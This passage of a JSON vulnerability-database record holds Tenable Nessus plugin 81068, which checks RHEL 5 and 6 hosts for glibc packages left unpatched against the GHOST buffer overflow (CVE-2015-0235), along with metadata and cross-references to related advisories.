"e010fd952706847a7e7ec9bd37c23380", "key": "cpe"}, {"hash": "813366c4a714f890ad158fca7c40bbaf", "key": "pluginID"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "cbab536cd5fdc2c0e0d64b3cdab702d9", "key": "title"}, {"hash": "2091fc8b5268a0c4b492e97e601c3a5f", "key": "references"}, {"hash": "341a141f8365cdd9e626c9fa294e819c", "key": "href"}, {"hash": "b46559ea68ec9a13474c3a7776817cfd", "key": "naslFamily"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=81068", "id": "REDHAT-RHSA-2015-0099.NASL", "lastseen": "2018-08-30T19:48:13", "modified": "2018-07-26T00:00:00", "naslFamily": "Red Hat Local Security Checks", "objectVersion": "1.3", "pluginID": "81068", "published": "2015-01-29T00:00:00", "references": ["http://rhn.redhat.com/errata/RHSA-2015-0099.html", "https://www.redhat.com/security/data/cve/CVE-2015-0235.html"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:0099. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81068);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2018/07/26 18:45:29\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_xref(name:\"RHSA\", value:\"2015:0099\");\n\n script_name(english:\"RHEL 5 / 6 : glibc (RHSA-2015:0099) (GHOST)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated glibc packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5.6 Long Life, Red Hat Enterprise Linux\n5.9 Extended Update Support, Red Hat Enterprise Linux 6.2 Advanced\nUpdate Support, and Red Hat Enterprise Linux 6.4 and 6.5 Extended\nUpdate Support.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX\nthread libraries (libpthread), standard math libraries (libm), and the\nName Server Caching Daemon (nscd) used by multiple programs on the\nsystem. Without these libraries, the Linux system cannot function\ncorrectly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the\ngethostbyname() and gethostbyname2() glibc function calls. A remote\nattacker able to make an application call either of these functions\ncould use this flaw to execute arbitrary code with the permissions of\nthe user running the application. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2015-0235.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://rhn.redhat.com/errata/RHSA-2015-0099.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.9\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(5\\.6|5\\.9|6\\.2|6\\.4|6\\.5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.6 / 5.9 / 6.2 / 6.4 / 6.5\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:0099\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{ sp = get_kb_item(\"Host/RedHat/minor_release\");\n if (isnull(sp)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\n\n flag = 0;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", reference:\"glibc-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i686\", reference:\"glibc-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-common-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"glibc-common-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"glibc-common-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-common-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"glibc-common-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", reference:\"glibc-debuginfo-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-debuginfo-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i686\", reference:\"glibc-debuginfo-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-debuginfo-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-debuginfo-common-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"glibc-debuginfo-common-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", reference:\"glibc-devel-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-devel-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-devel-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-headers-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"glibc-headers-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"glibc-headers-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-headers-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"glibc-headers-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-utils-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"glibc-utils-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"glibc-utils-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-utils-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"glibc-utils-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"nscd-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"nscd-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"nscd-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"nscd-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"nscd-2.5-107.el5_9.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"glibc-common-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"glibc-common-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"glibc-common-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"glibc-common-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-common-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-common-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"glibc-common-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-debuginfo-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-debuginfo-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-debuginfo-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-debuginfo-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-debuginfo-common-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-debuginfo-common-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-debuginfo-common-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-debuginfo-common-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-devel-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-devel-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-devel-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-devel-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"glibc-headers-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"glibc-headers-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"glibc-headers-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"glibc-headers-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-headers-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-headers-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"glibc-headers-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-static-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-static-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-static-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-static-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"glibc-utils-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"glibc-utils-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"glibc-utils-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"glibc-utils-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-utils-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-utils-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"glibc-utils-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"nscd-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"nscd-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"nscd-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"nscd-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"nscd-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"nscd-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"nscd-2.12-1.132.el6_5.5\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-debuginfo / glibc-debuginfo-common / etc\");\n }\n}\n", "title": "RHEL 5 / 6 : glibc (RHSA-2015:0099) (GHOST)", "type": "nessus", "viewCount": 2}, "differentElements": ["cvss"], "edition": 5, "lastseen": "2018-08-30T19:48:13"}], "edition": 13, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cpe", "hash": "d459846fc4189fab17e65d683fe5fd76"}, {"key": "cvelist", "hash": "841f459c9764bcdcd6d5a1955f15a6d5"}, {"key": "cvss", "hash": "2bdabeb49c44761f9565717ab0e38165"}, {"key": "description", "hash": "5a30b331c491a149b274795dcb31aa8e"}, {"key": "href", "hash": "341a141f8365cdd9e626c9fa294e819c"}, {"key": "modified", "hash": "474125cf5a862fc9b9ffbcfbe9b44ef8"}, {"key": "naslFamily", "hash": "b46559ea68ec9a13474c3a7776817cfd"}, {"key": "pluginID", "hash": "813366c4a714f890ad158fca7c40bbaf"}, {"key": "published", "hash": "3d8d634cf2d0899c0d90aff4e213fae6"}, {"key": "references", "hash": "d724cd7c7bdb670117d239f0719c8bcd"}, {"key": "reporter", "hash": "9cf00d658b687f030ebe173a0528c567"}, {"key": "sourceData", "hash": "ada315379c9f000e2e48a8928e6b3ddd"}, {"key": "title", "hash": "cbab536cd5fdc2c0e0d64b3cdab702d9"}, {"key": "type", "hash": "5e0bd03bec244039678f2b955a2595aa"}], "hash": "4033bbaec8ad559d4a05dce876a55d43df3780707feb91f697b172119e1b957d", "viewCount": 4, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-0235"]}, {"type": "paloalto", "idList": ["PAN-SA-2015-0002"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:63DB340A742A21A8EFB20A9452A0EDD2"]}, {"type": "vulnerlab", "idList": ["VULNERLAB:1430"]}, {"type": "f5", "idList": ["SOL16057", "F5:K16057"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:31672", "SECURITYVULNS:VULN:14240"]}, {"type": "thn", "idList": ["THN:A649F4ABCE9B99052139693A13D95B14", "THN:3DD8F9ADFFEB290F33825414D41B0F41", "THN:ACBFC80659E47A5B7C81B99570749679"]}, {"type": "redhat", "idList": ["RHSA-2015:0099", "RHSA-2015:0101", "RHSA-2015:0090", "RHSA-2015:0092"]}, {"type": "seebug", "idList": ["SSV:89237"]}, {"type": "oraclelinux", "idList": ["ELSA-2015-0101", "ELSA-2015-0090", "ELSA-2015-1627"]}, {"type": "debian", "idList": ["DEBIAN:DLA-139-1:5734D"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:130974", "PACKETSTORM:130171", "PACKETSTORM:130115"]}, {"type": "zdt", "idList": ["1337DAY-ID-23392", "1337DAY-ID-23215"]}, {"type": "threatpost", "idList": ["THREATPOST:8B5C2D5280CC957CA9A4CB0C697F96D8", "THREATPOST:3A858BD40E6943BD3F4553301036091D"]}, {"type": "exploitdb", "idList": ["EDB-ID:36421", "EDB-ID:35951"]}, {"type": "centos", "idList": ["CESA-2015:0092", "CESA-2015:0090"]}, {"type": "ics", "idList": ["ICSA-15-064-01A"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310850633", "OPENVAS:1361412562310120286", "OPENVAS:1361412562310882109", "OPENVAS:1361412562310105192", "OPENVAS:1361412562310871307", "OPENVAS:1361412562310105188", "OPENVAS:1361412562310123196", "OPENVAS:1361412562310123197", "OPENVAS:1361412562310882108", "OPENVAS:1361412562310850839"]}, {"type": "nessus", "idList": ["ORACLELINUX_ELSA-2015-0101.NASL", "ALA_ALAS-2015-473.NASL", "CENTOS_RHSA-2015-0090.NASL", "REDHAT-RHSA-2015-0092.NASL", "SL_20150127_GLIBC_ON_SL5_X.NASL", "OPENSUSE-2015-84.NASL", "CENTOS_RHSA-2015-0092.NASL", "PALO_ALTO_PAN-SA-2015-0002.NASL", "CISCO_TELEPRESENCE_CONDUCTOR_CSCUS69523.NASL", "CISCO_CUCM_CSCUS66650-GHOST.NASL"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2015:0184-1", "OPENSUSE-SU-2015:0162-1", "SUSE-SU-2015:0158-1"]}, {"type": "freebsd", "idList": ["0765DE84-A6C1-11E4-A0C1-C485083CA99C", "F7A9E415-BDCA-11E4-970C-000C292EE6B8"]}, {"type": "lenovo", "idList": ["LENOVO:PS500043-NOSID"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/HTTP/WORDPRESS_GHOST_SCANNER", "MSF:EXPLOIT/LINUX/SMTP/EXIM_GETHOSTBYNAME_BOF"]}, {"type": "cisco", "idList": ["CISCO-SA-20150128-GHOST"]}, {"type": "slackware", "idList": ["SSA-2015-028-01"]}, {"type": "cert", "idList": ["VU:967332"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20150226-01-GLIBC"]}, {"type": "ubuntu", "idList": ["USN-2485-1"]}, {"type": "amazon", "idList": ["ALAS-2015-473", "ALAS-2015-493", "ALAS-2015-494"]}], "modified": "2019-02-21T01:23:24"}, "score": {"value": 8.8, "vector": "NONE", "modified": "2019-02-21T01:23:24"}, "vulnersScore": 8.8}, "objectVersion": "1.3", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:0099. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81068);\n script_version(\"1.19\");\n script_cvs_date(\"Date: 2018/12/27 10:05:36\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_xref(name:\"RHSA\", value:\"2015:0099\");\n\n script_name(english:\"RHEL 5 / 6 : glibc (RHSA-2015:0099) (GHOST)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated glibc packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5.6 Long Life, Red Hat Enterprise Linux\n5.9 Extended Update Support, Red Hat Enterprise Linux 6.2 Advanced\nUpdate Support, and Red Hat Enterprise Linux 6.4 and 6.5 Extended\nUpdate Support.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX\nthread libraries (libpthread), standard math libraries (libm), and the\nName Server Caching Daemon (nscd) used by multiple programs on the\nsystem. Without these libraries, the Linux system cannot function\ncorrectly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the\ngethostbyname() and gethostbyname2() glibc function calls. A remote\nattacker able to make an application call either of these functions\ncould use this flaw to execute arbitrary code with the permissions of\nthe user running the application. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2015:0099\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-0235\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.9\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n 